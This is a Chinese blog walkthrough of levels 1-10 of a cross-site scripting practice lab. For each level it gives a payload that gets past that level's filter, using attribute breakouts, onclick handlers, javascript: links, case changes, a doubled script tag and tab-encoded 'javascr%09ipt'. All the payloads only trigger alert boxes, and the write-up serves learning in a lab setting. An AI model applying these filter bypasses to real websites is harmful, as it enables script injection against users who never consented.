XSS闯关挑战1-10

1

观察页面,发现页面没什么可利用的漏洞

但是url是?传参的类型,可以试试有没有xss漏洞

复制代码
<script>alert(/xss/)</script>

2

输入1的脚本发现没效果,看一下源代码,发现传入到value后是变成了字符串的形式,咱们就让他不是字符串

复制代码
<input name=keyword  value="  "><script>alert(/xss/)</script>"  ">

3

可以看到尖括号被过滤了

我们可以试试其他的可以弹出提示框的事件

复制代码
'  onclick='alert(/xss/)

还有以下常用事件

复制代码
mouseup  鼠标释放时触发
mousedown  鼠标按下时触发
mousemove   鼠标移动时触发
mouseout     鼠标离开时触发

4

过滤掉尖括号,以及用字符串

复制代码
"  onclick="alert(/xss/)

5

发现他过滤了事件,且大写也不行

我们可以用链接

复制代码
"> <a href = 'javascript:alert(/xss/)'>click me</a>"

6

用大写

复制代码
"> <a HREF = 'javascript:alert(/xss/)'>click me</a>"

7

过滤掉了href和script

复制代码
"><scrscriptipt>alert(/xss/)</scrscriptipt>"

8

想办法绕过

这里用制表符将script隔开

复制代码
javascr%09ipt:alert(/xss/)

9

提示连接不合法

在输入中输入url

复制代码
javascr%09ipt:alert('http://www.qq.com')

10

有三个input,试着传参

只有t_sort可以传参

发现输入事件无响应

试着加个按钮,成功了

复制代码
t_sort=dd" type="button" onclick="alert(/xss/)
相关推荐
Factor安全1 小时前
CVE-2025-24813 漏洞全解析|Apache Tomcat 关键路径绕过与RCE
安全·web安全·网络安全·tomcat·apache·安全威胁分析·安全性测试
BUG 劝退师1 小时前
进程间通讯(IPC)
运维·服务器·网络
GLAB-Mary1 小时前
如何将内网的IP地址映射到外网?详细方法与步骤解析
网络·tcp/ip·智能路由器
心思这就是2 小时前
网络安全L2TP实验
网络·安全·web安全
事业运财运爆棚2 小时前
服务器配置虚拟IP
网络
无名之逆3 小时前
[特殊字符] Hyperlane:Rust 高性能 HTTP 服务器库,开启 Web 服务新纪元!
java·服务器·开发语言·前端·网络·http·rust
桥边驿语人3 小时前
使用Docker Desktop进行本地打包和推送
运维·docker·容器·本地打包
EasyGBS3 小时前
国标GB28181协议EasyCVR视频融合平台:5G时代远程监控赋能通信基站安全管理
大数据·网络·人工智能·安全·音视频
头发尚存的猿小二4 小时前
Linux--文件系统
linux·运维·服务器
是程序喵呀5 小时前
软考《信息系统运行管理员》- 7.1 物联网运维
运维·物联网·软考